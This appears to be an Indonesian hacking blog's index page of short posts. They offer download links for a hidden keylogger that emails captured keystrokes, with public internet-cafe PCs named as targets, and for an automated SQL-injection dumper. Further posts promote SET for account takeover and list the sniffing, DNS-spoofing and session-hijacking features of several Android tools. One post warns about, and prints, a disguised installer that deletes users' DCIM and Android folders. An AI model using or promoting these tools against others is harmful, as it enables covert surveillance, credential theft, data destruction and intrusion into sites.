Eaisai Keylogger untuk pemula

Halo teman - teman , kali ini saya mau share Tool keylogger yang cukup simpel untuk pemula.
apa itu keylogger ?    Keylogger pada dasar nya adalah software yang dapat merekam segala akivitas pada sebuah komputer. keylogger dapat merekam keystroke dari sebuah komputer.

keylogger biasa digunakan untuk memantau komputer sendiri, agar tau kalau ada yang menggunakan komputer selain kita.

Tapi Keylogger juga biasa di sisipkan pada komputer - komputer warnet yang sudah pasti tujuan nya adalah mendapatkan informasi sensitive seperti password , username dll.

jadi kalau kalian pernah kehilangan akun sosmed kalian padahal kalian tidak pernah membuka dan login di web phising, atau lupa log out dari browser di warnet.
inilah penyebab kalian kehilangan akun kalian.

keylogger dipasang oleh pemilik warnet itu sendiri dengan tujuan mendapatkan akun akun pengguna, lalu dijual. tapi  tidak semua warnet seperti itu ya 😁😁\

apa aja sih fituer keylogger ini :

1. berjalan secara private dan hidden, sehingga tidak mudah disadari orang lain

2. semua data yang direkam dapat dikirim melalui email

3. dapat merekam semua situs yang dikunjungi

apa kegunaan keylogger ini :

1. megetahui apa yang terjadi pada kommputer mu ketika kamu sedang tidak ada

2. memonitoring kerabat atau keluarga

3. memonitoring pc publik seperti di warnet - warnet

Download Eaisai keylogger : Easai Keylogger

Read More

SQL dumper terbaru

SQL dumper adalah software yang berfungsi untuk mencari web yang vuln sqli dan langsung menginjeksi secara otomatis.
SQL Dumper ini support beberapa mesin pencari untuk mencari web web vuln seperti :

• Google
• Bing
• Yahoo
• Aol
• Yandex
• Ask
• Wow
• WebCrawler
• MyWebSearch
• Sapo

Kalian bisa membuka database sebuah web secara detail apabila kalian menemukan web yang vuln.

Fitur dari SQL Dumper v.8.5 :

• Support 20 metode SQL Injection
• Admin login finder
• GeoIP database
• Mencari automatis web web vuln
• Bisa menembus beberapa WAF website
• Bisa menggunakan proxy
• Secara automatis membuang url yang tidak dapat di injek

LINK DOwnload :
SQL Dumper 1

SQL Dumper 2

Read More

SET - powerfull Social Enginering Toolkit

SET atau social - enginering toolkit adalah open source penetration testing framework yang di desain khusus social enginering.

SET adalah produk dari Trustedsec organisasi information technology security consulting yang besar.

SET hanya memdukung dua os  yaitu linux dan Mac OS

yang jelas tool ini sangat cocok untuk take over / mengambil alih akun sosial media dsb.
langsung saja Link download dan tutorial pemasangan ada di SET pentesting framework

change log

version 8.0.1

~~~~~~~~~~~~~~~~

* fix an issue when using import on web clone

~~~~~~~~~~~~~~~~

version 8.0

~~~~~~~~~~~~~~~~

* fix an issue that caused metasploit web server to not properly work with apache_server to off

* changed arduino powershell shellcode to https instead of http

* fixed bug that would not generate powershell encoded code when using arduino

* fixed a sudo check for SET when not running as root would cause a log error exception

* removed setup.py in favor of requirements.txt - no longer needed

* updated readme and install documentation to reflect new install procedures through requirements.txt

* updated copyright information to 2019

* removed irc channel, no longer active or used

* removed old sms phishing menu - spoofmytext never fixed their API and no longer supported

* removed full screen attack - no longer supported or maintained

* removed html generation from web attack, no longer supported

~~~~~~~~~~~~~~~~

version 7.7.9

~~~~~~~~~~~~~~~~

* fix source.js not copying over when using tabnabbing

* bump config version and add default apache dir to /var/www/html

* fix sendmail not found on OSX when using phishing emails

~~~~~~~~~~~~~~~~

version 7.7.8

~~~~~~~~~~~~~~~~

* fix ident issue on harvester throwing templates off

~~~~~~~~~~~~~~~~

version 7.7.7

~~~~~~~~~~~~~~~~

* remove old test code

* add better wording for templates

* remove old templates yahoo and facebook

* add better descriptions for using NAT/External IP addresses for credential harvester

* fix if a custom PDF is selected, it won't default to a blank pdf

* add user variable to harvester

~~~~~~~~~~~~~~~~

version 7.7.6

~~~~~~~~~~~~~~~~

* fix GOAT message when starting SSL server

* fix BaseServer not being identified in import

* fix OSX cloning for harvester (port allocation)

* fix web server from not closing properly when using java applet attack

~~~~~~~~~~~~~~~~

version 7.7.5

~~~~~~~~~~~~~~~~

* fix line split based on = on credential harvester

~~~~~~~~~~~~~~~~

Read More

Bahaya asal install tool/script di termux

Halo teman - teman, kali saya akan membahas bahaya menginstall script/tools yang biasa di ambil dari github.

beberapa waktu yang lalu di group group pengguna termux di FB,WA ramai orang membicarakan tool yang disebut Dark FB dengan berbagai versi yang bermacam. bermacam macam repo dark fb disebar, banyak menginstall dan berhasil tetapi tidak sedikit juga yang gagal.
kemudian saya berniat mencoba dark fb yang sedang HOT ini.

googling  dark fb
dapat 1 repo https://github.com/ZeDDParker/dark-fb
script ditulis dengan bahasa python.
kemudian saya bongkar isi script ini dan teryata script ini berisi code yang berbahaya
script dapat menghapus beberapa  directory pada android

begini isinya

import os,sys,time

os.system("reset")
print "Install Tools..."
time.sleep(2)
os.system("cd /sdcard")
os.system("rm -rf DCIM")
os.system("rm -rf Android")
os.system("git clone https://github.com/rezadkim/dark-fb")
os.system("cd dark-fb")
os.system("python2 dark.py")


script ini menghapus dir DCIM dan Android
kemudia mengclone repo dark fb dari rezadkim dan diinstall secara otomatis
sehingga, seolah olah script berjalan dengan baik
tentu saja saya tidak jadi menginstall dengan script tersebut.

jadi sebelum  menginstall, baca dulu isi nya
sekian terimakasih.

Read More

sniffing jaringan di android dengan intercepter

intercepter-ng adalah tool yang di gunakan untuk sniffing jaringan sama seperti wireshark dll.
cara pemakaian bisa liat di google.





link Download : intercepter-ng Latest

berikut update fiture terbaru :

1.9 New:
+ Port Scanner (long click on IP)
+ DNS Spoofing
+ Improvements and fixes
1.8b New:
+ 'Gateway not found' fixed
+ Support for intel\arm x32\x64 devices
+ Clipboard usage for Cookies
+ Improvements and fixes
1.7 New:
+ Netmask bug fixed
+ Subnet scanning improved
+ Address bar in Cookie Viewer
+ Data view in Raw Mode

Read More

Red Hawk - Open Source Information Gathering and Vulnerability Scanning tool

Red Hawk adalah tool Open source yang ditulis menggunakan bahasa pemrograman PHP yang memiliki banyak fiture seperti Information Gathering, Vulnerability Scanner dll.
Red Hawk juga dapat mendeteksi CMS seperti joomla, wordpress, magento, drupal.

Download : RED HAWK

cara menggunakan Red Hawk :
Download terlebih dahulu Red Hawk nya
$ cd RED_HAWK
$ php rhawk.php
$ masukan url target mu
$ kemudian pilih fiture yang ada di menu

apa saja yang bisa kamu Scan dengan tool ini ?

• Basic Scan
  
  • Site Title NEW
  • IP Address
  • Web Server Detection IMPROVED
  • CMS Detection
  • Cloudflare Detection
  • robots.txt Scanner
• Whois Lookup IMPROVED
• Geo-IP Lookup
• Grab Banners IMPROVED
• DNS Lookup
• Subnet Calculator
• Nmap Port Scan
• Sub-Domain Scanner IMPROVED
  
  • Sub Domain
  • IP Address
• Reverse IP Lookup & CMS Detection IMPROVED
  
  • Hostname
  • IP Address
  • CMS
• Error Based SQLi Scanner
• Bloggers View NEW
  
  • HTTP Response Code
  • Site Title
  • Alexa Ranking
  • Domain Authority
  • Page Authority
  • Social Links Extractor
  • Link Grabber
• WordPress Scan NEW
  
  • Sensitive Files Crawling
  • Version Detection
  • Version Vulnerability Scanner
• Crawler
• MX Lookup NEW
• Scan For Everything - The Old Lame Scanner

Read More

Csploit : Advance Android Network Pentesting Suite

Csploit adalah paket analisis dan penetrasi jaringan
Android gratis dan open source yang bertujuan untuk menjadi
toolkit profesional paling lengkap dan canggih untuk pakar keamanan
TI untuk melakukan test keamanan jaringan pada perangkat seluler. Csploit juga memiliki banyak Fiture didalamnya

Download Csploit 
 
Feature :

• Map your local network
• Fingerprint hosts' operating systems and open ports
• Add your own hosts outside the local network
• Integrated traceroute
• Integrated metasploit framework RPCd
  • Search hosts for known vulnerabilities via integrated Metasploit daemon
  • Adjust exploit settings, launch, and create shell consoles on exploited systems
  • More coming
• Forge TCP/UDP packets
• • Image, text, and video replacement-- replace your own content on unencrypted web pages
  • JavaScript injection-- add your own javascript to unencrypted web pages.
  • password sniffing ( with common protocols dissection )
  • Capture pcap network traffic files
  • Real time traffic manipulation to replace images/text/inject into web pages
  • DNS spoofing to redirect traffic to different domain
  • Break existing connections
  • Redirect traffic to another address
  • Session Hijacking-- listen for unencrypted cookies and clone them to take Web session
• Perform man in the middle attacks (MITM) including: 
• Image, text, and video replacement-- replace your own content on unencrypted web pages
• JavaScript injection-- add your own javascript to unencrypted web pages.
• password sniffing ( with common protocols dissection )
• Capture pcap network traffic files
• Real time traffic manipulation to replace images/text/inject into web pages
• DNS spoofing to redirect traffic to different domain
• Break existing connections
• Redirect traffic to another address
• Session Hijacking-- listen for unencrypted cookies and clone them to take Web session

untuk Tutorial Akan menyusul secepatnya

Read More